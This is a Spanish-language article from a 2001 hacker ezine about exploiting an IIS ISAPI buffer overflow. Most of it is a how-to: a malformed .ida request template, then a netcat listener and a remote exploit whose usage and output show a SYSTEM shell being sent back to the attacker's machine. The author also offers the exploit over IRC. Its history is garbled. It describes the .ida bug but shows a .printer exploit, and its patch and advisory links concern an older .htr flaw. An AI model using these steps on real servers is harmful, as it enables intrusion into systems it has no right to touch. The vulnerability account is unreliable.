~= EXPLOTAR EL ISAPI BUG by ZeRo-DivI - Disidents Journal 002 =~

             - D I S I D E N T S - H A C K  J O U R N A L -

                              Numero 2
                                XXII









 				TITLE: EXPLOTAR EL ISAPI BUG
                                Author: ZeRo-DivI
                                DISIDENTS ESPAÑA 2001 -  LOS FUERA DE LA LEY







                  _______________________________________
                 /*                                    */
                /*   -Explotar el ISAPI bug           */
               /*                   -By ZeRo-DivI    */
              /*____________________________________*/



         INDICE
        --------
 1.Introduccion
 2.¿Que es?
     2.1.Tecnicamente
     2.2.Traduccion
 3.Primeras reacciones
     3.1.De eEye
     3.2.De Microsoft
     3.3.Del resto
 4.Como explotarlo
     4.1.Herramientas
     4.2.Manos a la obra
 5.Lugares donde informarse
 6.Despedida







 INTRODUCCION
 ------------

 Bueno, lo que voy a intentar con este texto es mostraros todo lo que se so-
 bre este bug de nt, explotarlo, arreglarlo, lugares donde documentarse...
 Este bug fue descubierto por eEye, que  inmediatamente aviso del problema a
 microsoft, y stos a su vez sacaron un parche muy tardio que no puedo evitar
 un gran numero de ataques, pero bueno esto ya es parte de las primeras rea-
 cciones.



 2.¿QUE ES?
 ----------

 2.1.Tecnicamente


 Para empezar, debeis sabes que isapi es un filtro que poseen todas las ver-
 siones de Internet Information Server, y que en este reside el problema.Es-
 te filtro  es el encargado de controlar los limites de los datos introduci-
 dos por los usuarios, pues bien, el isapi k poseen los archivos  con exten-
 sion .ida (Indexing Service) no realizan las comprobaciones  adecuadas, por
 lo k el server resulta vulnerable a un atake de  desbordamiento de bufer.
 Cualkier persona que  consiga explotar el bug  consige  acceso de sistema a
 cualquier windows   NT 4.0,Windows 2000, o Windows XP con IIS como servidor
 web.Con este nivel,el atacante  puede acer lo k kiera dentro del server,por
 ejemplo añadir usuarios,ejecutar programas eliminar bases de datos... y mu-
 chas kosas mas k pueden traer de cabeza a cualquier admin.

 Este es un ataque tipico de desbordamiento de bufer:

 GET /NULL.ida?[buffer]=X HTTP/1.1

 Donde [buffer] tiene un tamaño aproximado de 240 bytes.


 2.2.Traduccion


 Pues lo que todo lo de arriba significa es lo siguiente:
 Todos los IIS tienen un fayo bastante gordo que provoca que kualkier perso-
 na que tenga unos minimos conocimientos, y  el xploit adecuado pueda entrar
 en un server y liar una buena, o simplemente  limitarse a avisar,  cosa que
 por desgracia no ocurre muy a menudo.



 3.PRIMERAS REACCIONES
 ---------------------

 3.1.De eEye


 Teneis que saber que eEye es una compañia de seguridad muy importante, para
 enteraros de lo q va   la kosa.Bueno, pues el equipo de eEye fueron los que
 descubrieron el fallo,y los que avisaron a  microsoft.Una semana despues de
 avisar a microsoft, y viendo que estos no tomaban cartas en el  asunto, los
 de eEye decidieron sacar el problema a la luz,  y despues  de unos  dias un
 xploit  para xplotar el bug, y a su vez un parche para arreglarlo.El parche
 de eEye trataba consisitia en  limitar las peticiones de archivos htr a 255
 caracteres, y guardar en un log la IP del atacante que  intentaba la sobre-
 carga, eEye reconocio que no era perfecto, pero si mas seguro que las reco-
 mendaciones que poco antes habia echo microsoft.


 3.2.De Microsoft


 Nada mas recibir la noticia, microsoft empezo a estudiar el fallo, o por lo
 menos es lo que deberia de aber echo, pero no saco a la luz el bug, y menos
 presento un parche para arreglarlo.  Al ver que eEye  desvelava el bug, mi-
 crosoft lo unico que izo fue criticar a  la compañia, y recomendar a los u-
 suarios de IIS que eliminaran el filtro isapi,cosa que perjudicaria al ser-
 vidor.Al final, y  y con bastante retraso microsoft  presento un parche que
 solucionaba el problema sin cambiar las  funcionalidades de los IIS.


 3.3.Del resto


 La noticia, tuvo dinstintas opiniones,algunos usuarios se sorprendieron del
 tremendo error, otros que  ya estaban  aconstunbrados  se limitaron  a par-
 chear, y aunque parezca raro,muchisimos admin de IIS no han  parcheado por-
 que ni siquiera saben  de este bug. De cara al hack,  la noticia fue tomada
 como una forma mas de meterse en un server,  eso de  cara al hack,  pero de
 cara al lameruzeo a sido una forma genial de ir  jodiendo servers a diestro
 y siniestro.Las empresas de seguridad, se limitaron a dar informacion deta-
 llada del bug, pero no sacaron ningun parche.



 4.COMO EXPLOTARLO
 -----------------

 4.1.Herramientas


 Antes de comenzar a explicaros que hay que acer y to eso,debereis saber que
 hay dos programas que teneis que tener para poder explotar el bug.Estos dos
 programas son el netcat (nc.exe), y un xploit remoto.  Los  dos vendran con
 la revista, de todas formas no es muy dificil conseguirlos por la red.


 4.2.Manos a la obra


 Bueno, pues una vez tengamos estos dos programas lo primero que aremos sera
 abrir una ventana de ms-dos, y ejecutar el netcat con el komando -l -p 100
 -vv , vamos que lo que hay k poner es:

 nc.exe -l -p 100 -vv

 y os respondera asi:

 listening on [any] 100 ...

 Esto provocara qu el netcat se quede esperando una conexion al puerto 100.
 Una vez echo esto abriremos otra ventana aparte tambien de ms-dos, esta pa-
 ra ejecutar el xploit.Si ejecutas el xploit sin mas, te  pondra algo asi:

 iis5 remote .printer overflow.
 dark spyrit  / beavuh labs.
 Usage: C:\xploit.exe    

 Todo esto quiere  decir que para usarlo  hay que  proporcionar al xploit un
 host victima, el puerto al que lo vas a ejecutar, tu host, y el puerto tuyo
 k vas a utilizar.
 En resumen:

 xploit  <80>  <100>

 Supongo que abreis caido para que ponemos 100, para los que no  os recuerdo
 que antes dejamos el netcat escuchando a ese mismo puerto, pa ver si pasaba
 algo, pues bien, si el server al que as ejekutado el xploit es  vulnerable,
 en menos de 5 segundos os aparecera su C:\winnt\system32\ en vuestra venta-
 na de ms-dos, si por el contrario, no lo es os saldra algo asi:

 iis5 remote .printer overflow.
 dark spyrit  / beavuh labs.

 Connected.
 sent...
 tou many need to send a carriage on your listener if the shell doesn´t appear.
 have fun!



 LUGARES DONDE INFORMARSE
 ------------------------


 HispaSec: http://www.hispasec.com/unaaldia.asp?id=232
 Parche de eEye: http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
 Aviso de eEye: http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
 Boletín de Microsoft: http://www.microsoft.com/security/bulletins/ms99-019.asp
 Aviso del CERT: http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html
 CNet: http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni
 Parche de microsoft para Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
 Parche de microsoft para Windows 2000 Professional, Server y Advanced Server: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800



 DESPEDIDA
 ---------


 Bueno, solo quiero deciros que no seais muy critikos con este texto, puesto
 que es el primero que escribo para  la ezine.Espero que os sirva de mucho y
 que aprendais algo con el,y tambien que no lo utiliceis para joder servidores.
 Ah¡ otra kosa, si conseguis  este texto de otra forma  que no sea a traves de
 la ezine, me podeis  buscar por el irc, y no me importara pasaros el netcat o
 el xploit.

 PD: un saludo a la gente de #disidents #hack_escuela #hackademia #orglacurva
 #seguridad #bandaancha  #la_mafia ...
[volver]